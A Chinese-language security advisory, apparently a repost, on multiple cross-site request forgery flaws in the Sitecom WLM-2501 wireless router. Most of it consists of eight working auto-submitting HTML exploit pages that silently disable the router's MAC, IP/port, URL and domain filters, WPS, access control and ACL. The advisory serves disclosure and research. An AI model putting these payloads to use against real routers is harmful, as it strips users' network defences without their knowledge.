Sitecom WLM-2501多个跨站请求伪造漏洞

文章由LinuxBoy分享于2019-04-02 08:04:43热评（206）

Sitecom WLM-2501多个跨站请求伪造漏洞

发布日期：2012-03-21
更新日期：2012-03-27

受影响系统：
Sitecom WLM-2501
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 52700

Sitecom WLM-2501是无线调制解调器路由器300N，使用Web管理界面，默认监听在TCP/IP端口80，默认管理员是admin，默认ip地址是192.168.0.1。

Sitecom WLM-2501在实现上存在多个跨站请求伪造漏洞，攻击者可利用这些漏洞非法访问受影响设备并执行某些管理员操作，更改下列路由器参数：

- Disable Mac Filtering
- Disable/Modify IP/Port Filtering
- Disable/Modify Port Forwarding
- Disable/Modify Wireless Access Control
- Disable Wi-Fi Protected Setup
- Disable/Modify URL Blocking Filter
- Disable/Modify Domain Blocking Filter
- Disable/Modify IP Address ACL
- Change Wireless Passphrase
- Enable/Modify Remote Access (also on WAN interface)

<*来源：Ivano Binetti

链接：http://www.webapp-security.com/2012/03/sitecom-wlm-2501-multiple-csrf-vulnerabilities/

*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Ivano Binetti （）提供了如下测试方法：
3.1 Disable Mac Filtering
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" name="form0" action="http://192.168.0.1:80/goform/admin/formFilter">
<input type="hidden" name="outAct" value="1"/>
<input type="hidden" name="inAct" value="1"/>
<input type="hidden" name="setMacDft" value="Apply"/>
<input type="hidden" name="submit-url" value="/fw-macfilter.asp"/>
</form>
</body>
</html>
3.2 Disable IP/Port Filtering
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" name="form0" action="http://192.168.0.1:80/goform/formFilter">
<input type="hidden" name="outAct" value="1"/>
<input type="hidden" name="inAct" value="1"/>
<input type="hidden" name="setDefaultAction" value="Apply"/>
<input type="hidden" name="submit-url" value="/fw-ipportfilter.asp"/>
</form>
</body>
</html>
3.3 Disable Port Forwarding
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" name="form0" action="http://192.168.0.1:80/goform/formPortFw">
<input type="hidden" name="portFwcap" value="0"/>
<input type="hidden" name="apply" value="Apply"/>
<input type="hidden" name="select_id" value=""/>
<input type="hidden" name="submit-url" value="/fw-portfw.asp"/>
</form>
</body>
</html>
3.4 Disable Wireless Access Control
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" name="form0" action="http://192.168.0.1:80/goform/admin/formWlAc">
<input type="hidden" name="wlanAcEnabled" value="0"/>
<input type="hidden" name="setFilterMode" value="Apply"/>
<input type="hidden" name="submit-url" value="/wlactrl.asp"/>
</form>
</body>
</html>
3.5 Disable Wi-Fi Protected Setup
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" name="form0" action="http://192.168.0.1:80/goform/formWsc">
<input type="hidden" name="wlanDisabled" value="OFF"/>
<input type="hidden" name="disableWPS" value="ON"/>
<input type="hidden" name="submit-url" value="/wlwps.asp"/>
<input type="hidden" name="save" value="Apply"/>
</form>
</body>
</html>
3.6 Disable URL Blocking Filter
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" name="form0" action="http://192.168.0.1:80/goform/formURL">
<input type="hidden" name="urlcap" value="0"/>
<input type="hidden" name="apply" value="Apply"/>
<input type="hidden" name="urlFQDN" value=""/>
<input type="hidden" name="Keywd" value=""/>
<input type="hidden" name="submit-url" value="/url_blocking.asp"/>
</form>
</body>
</html>
3.7 Disable Domain Blocking Filter
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" name="form0" action="http://192.168.0.1:80/goform/formDOMAINBLK">
<input type="hidden" name="domainblkcap" value="0"/>
<input type="hidden" name="apply" value="Apply"/>
<input type="hidden" name="blkDomain" value=""/>
<input type="hidden" name="submit-url" value="/domainblk.asp"/>
</form>
</body>
</html>
3.8 Disable IP Address ACL Filter
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" name="form0" action="http://192.168.0.1:80/goform/admin/formACL">
<input type="hidden" name="lan_ip" value="192.168.0.1"/>
<input type="hidden" name="lan_mask" value="255.255.255.0"/>
<input type="hidden" name="aclcap" value="0"/>
<input type="hidden" name="apply" value="Apply"/>
<input type="hidden" name="enable" value="1"/>
<input type="hidden" name="interface" value="0"/>
<input type="hidden" name="aclIP" value=""/>
<input type="hidden" name="aclMask" value=""/>
<input type="hidden" name="submit-url" value="/acl.asp"/>
</form>
</body>
</html>
+---------------------------------------------

建议：
--------------------------------------------------------------------------------
厂商补丁：

Sitecom
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.sitecom.com/wireless-modem-router-300n/p/859

推荐文章：

Sitecom WLM-2501多个跨站请求伪造漏洞